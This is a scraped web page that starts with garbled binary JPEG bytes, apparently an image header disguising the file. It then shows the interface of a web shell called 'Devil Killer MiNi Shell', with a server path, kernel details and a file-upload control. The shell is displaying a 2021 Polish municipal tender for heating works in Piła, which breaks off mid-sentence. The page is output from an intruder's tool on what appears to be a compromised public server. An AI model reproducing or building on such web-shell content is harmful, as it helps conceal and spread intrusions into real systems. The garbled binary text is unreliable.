JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210628/0009636701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00096367 z dnia 2021-06-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zmiana sposobu ogrzewania lokali mieszkalnych w budynku komunalnym przy ul. Domańskiego 10 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Piła-Miejski Zakład Gospodarki Mieszkaniowej w Pile</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Zakład Gospodarki Mieszkaniowej w Pile</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 301979488</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbrowskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-920</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">673514888</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">673514804</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzgm.pila.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzgm.pila.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zmiana sposobu ogrzewania lokali mieszkalnych w budynku komunalnym przy ul. Domańskiego 10 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dc1a56e0-d7dd-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00096367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002323/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zmiana sposobu ogrzewania lokali mieszkalnych w budynku komunalnym przy ul. Domańskiego 10</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzgmpila.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzgmpila.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych w szczególności w formatach txt, rtf, PDF, doc, docx., odt. przy czym ze względów technicznych zaleca się stosowanie formatu. pdf, o wielkości plików do 100MB<br/>2.	Ofertę, a także oświadczenie o jakim mowa w Rozdziale VIII ust. 1 SWZ składa się pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3.	Zamawiający zgodnie z art. 67 Pzp podaje wymagania techniczne związane z korzystaniem z platformy ezamawiajacy.<br/>1).	Stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4)	Włączona obsługa JavaScript<br/>5)	Zainstalowany program Adobe Reader lub inny obsługujących format plików PDF.<br/>6)	Platforma ezamawiajacy.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8<br/>7)	Oznaczenie czasu odbioru danych przez platformę ezamawiajacy.pl stanowi datę oraz dokładny czas generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>17.	Zamawiający dopuszcza komunikację między zamawiającym a wykonawcami za pomocą poczty elektronicznej – e-mail: mbalinska-koniec@mzgm.pila.pl z wyjątkiem przesyłania dokumentów, o których mowa w Rozdziale XII pkt 4. W korespondencji Wykonawca powinien powołać się na numer postępowania: 2021/TP/05</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Państwa danych osobowych jest Miejski Zakład Gospodarki Mieszkaniowej w Pile, z siedzibą 64-920 Piła, ul. Dąbrowskiego 8, NIP: 764-266-26-28, REGON: 301979488 reprezentowany przez Dyrektora (dalej: Administrator).<br/>2.	Jeśli mają Państwo pytania dotyczące sposobu i zakresu przetwarzania Państwa danych osobowych w zakresie działania MZGM w Pile, a także przysługujących Państwu uprawnień, mogą Państwo skontaktować się z wyznaczonym Inspektorem Ochrony Danych za pośrednictwem adresu email: iod@mzgm.pila.pl<br/>3.	Administrator przetwarza Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4.	Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art.74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”.<br/>5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6.	Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7.	W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Posiadają Państwo prawo do:<br/>a.	dostępu do danych osobowych Państwa dotyczących w tym otrzymania ich kopii;<br/>b.	do sprostowania Państwa danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>c.	do żądania od administratora ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO – prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, <br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Państwu prawo do:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporzadzenia 2016/679 nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o kitórym mowa w art. 18 ust. w/w rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">znak spr. 2021/TP/05</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zmiana sposobu ogrzewania lokali mieszkalnych w budynku komunalnym przy <br/>ul. Domańskiego 10 zgodnie projektem budowlanym i przedmiarem robót sporządzonym przez mgr. inż. Marcina Kodzika w dniu 30.04.2021 r.<br/>2. Przedmiot zamówienia obejmuje wykonanie robót budowlanych zgodnie z projektem budowlanym oraz Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych obowiązującym prawem, normami, zasadami wiedzy technicznej, sztuką budowlaną, <br/>W zakres robót wchodzą m.in następujące prace:<br/>a)	wykonanie pomieszczenia węzła c.o. i c.w.u na parterze budynku,<br/>b)	wykonanie rurociągów instalacji zasilającej lokale mieszkalne (poziom i pion) c.o. <br/> i c.w.u. zgodnie z PT<br/>c)	rozebranie pieców kaflowych<br/>d)	demontaż starych instalacji centralnego ogrzewania wraz z grzejnikami<br/>e)	uzupełnienie podłogi pod piecami i ułożenie wykładziny lub deski podłogowej<br/>f)	wykonanie instalacji centralnego ogrzewania z montażem grzejników<br/>g)	wykonanie instalacji ciepłej wody użytkowej<br/>h)	montaż ciepłomierzy i wodomierzy c.w.u<br/>i)	izolacja termiczna rurociągów na klatce schodowej<br/>j)	zabudowa rurociągów instalacji na klatce schodowej płytą k/g z montażem szafek na ciepłomierze i wodomierze c.w.u.<br/>k)	szpachlowanie i malowanie zabudowy na klatce schodowej oraz ścian za piecami i w miejscach przekuć z przygotowaniem powierzchni w lokalach mieszkalnych.<br/>l)	wykonanie robót pomocniczych, przygotowawczych i porządkowych oraz naprawa ewentualnych uszkodzeń,<br/>m)	przygotowanie placu budowy i zabezpieczenie go oraz oznakowanie zgodnie z obowiązującymi przepisami,<br/>n)	zapewnienie na koszt Wykonawcy zaplecza budowy dla siebie oraz niezbędne pomieszczenia potrzebne do prowadzenia nadzoru,<br/>o)	zapewnienie i utrzymanie bezpieczeństwa terenu budowy oraz robót poza terenem budowy w okresie trwania realizacji umowy, aż do zakończenia robót,<br/>p)	zapewnienie kierownika robót<br/>q)	przeprowadzenie wymaganych prób, badań i sprawdzeń, prób eksploatacyjnych, zgodnie z obowiązującymi przepisami w tym zakresie,<br/>5. Roboty budowlane należy wykonywać zgodnie z zaleceniami nadzoru inwestorskiego Zamawiającego, obowiązującymi warunkami technicznymi, normami, Prawem budowlanym i sztuką inżynierską,<br/>6. Wszystkie zastosowane materiały, urządzenia muszą odpowiadać obowiązującym normom oraz posiadać wymagane atesty, certyfikaty i aprobaty techniczne, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	Zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>3)	Sytuacji ekonomicznej lub finansowej - warunek zostanie spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia z sumą gwarancyjną nie niższą niż 80.000,00 zł <br/>UWAGA:<br/>a)	w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dotyczący sytuacji ekonomicznej lub finansowej podmioty mogą spełniać wspólnie.<br/>b)	Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej, wymaganych przez Zamawiającego, może złożyć inne dokumenty, które w sposób wystarczający potwierdzą spełnienie opisanych przez Zamawiającego warunków udziału w postępowaniu,<br/>c)	W przypadku złożenia przez Wykonawcę dokumentów zawierających kwoty wyrażone w innej walucie niż PLN, Zamawiający jako kurs przeliczeniowy przyjmie:<br/>- średni kurs danej waluty opublikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych,<br/>- jeżeli w dniu publikacji ogłoszenia w Biuletynie Zamówień publicznych Narodowy bank Polski nie publikuje średniego kursu waluty, za podstawę przeliczenia przyjmie się średni kurs waluty publikowany pierwszego dnia po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany. <br/><br/>4)	Zdolności technicznej lub zawodowej:<br/>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że: <br/>a)	nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 roboty związane ze zmianą sposobu ogrzewania wielorodzinnych budynków mieszkalnych z podłączeniem do sieci MEC o wartości nie mniejszej niż 80.000,00 zł każda, wraz z załączeniem dowodów określających, czy te roboty zostały wykonane należycie. <br/>UWAGA:<br/>Dowodami, o których mowa powyżej są referencje bądź dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>b)	Dysponuje lub będzie dysponował na etapie realizacji zamówienia kierownikiem robót z uprawnieniami wykonawczymi do instalacji sanitarnych oraz niezbędnymi monterami i pracownikami ogólnobudowlanymi.<br/>UWAGA:<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami <br/>c)	Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należność<br/>d)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależni od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia z sumą gwarancyjną nie mniejszą niż: 80.000,00 zł (słownie: osiemdziesiąt tysięcy złotych)<br/>b)	Wykaz robót budowlanych wykonanych nie wcześniej niż 5 lat, 